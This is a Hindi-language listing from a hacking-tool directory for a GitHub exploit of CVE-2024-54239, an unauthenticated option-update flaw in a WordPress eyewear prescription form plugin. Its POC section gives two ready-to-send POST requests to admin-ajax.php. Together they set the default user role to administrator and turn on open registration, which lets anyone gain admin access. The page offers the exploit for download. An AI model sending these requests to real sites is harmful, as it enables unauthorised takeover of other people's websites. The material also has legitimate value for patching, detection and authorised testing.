Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/randomrobbiebf/cve-2024-54239
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षागलत कॉन्फ़िगरेशन
GitHubrandomrobbiebf/cve-2024-54239

CVE-2024-54239

चश्मे के नुस्खे का फॉर्म <= 4.0.18 - प्रमाणीकरण की कमी से अप्रमाणित मनमाना विकल्प अद्यतन

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-54239

ईयवियर प्रिस्क्रिप्शन फॉर्म <= 4.0.18 - अनधिकृत मनमाना विकल्प अद्यतन के लिए अनुपलब्ध प्राधिकरण

विवरण

वर्डप्रेस के लिए ईयवियर प्रिस्क्रिप्शन फॉर्म प्लगइन डेटा के अनधिकृत संशोधन के लिए संवेदनशील है जो प्रिविलेज एस्केलेशन का कारण बन सकता है, क्योंकि 4.0.18 तक और सहित सभी संस्करणों में adminSetting() फंक्शन पर एक क्षमता जांच गायब है। यह संभव बनाता है कि अप्रमाणित हमलावर वर्डप्रेस साइट पर मनमाने विकल्पों को अद्यतन कर सकते हैं। इसका उपयोग पंजीकरण के लिए डिफ़ॉल्ट भूमिका को व्यवस्थापक में अद्यतन करने और उपयोगकर्ता पंजीकरण सक्षम करने के लिए किया जा सकता है, ताकि हमलावर एक संवेदनशील साइट पर व्यवस्थापक उपयोगकर्ता पहुंच प्राप्त कर सकें।

विवरण

  • प्रकार: प्लगइन
  • स्लग: eyewear-prescription-form
  • प्रभावित संस्करण: 4.0.18
  • CVSS स्कोर: 9.8
  • CVSS रेटिंग: क्रिटिकल
  • CVSS वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2024-54239
  • स्थिति: सक्रिय

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

action=adminSetting&data[settingCode]=default_role&data[settingValue]=administrator
root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

action=adminSetting&data[settingCode]=users_can_register&data[settingValue]=1
टूल डाउनलोड करें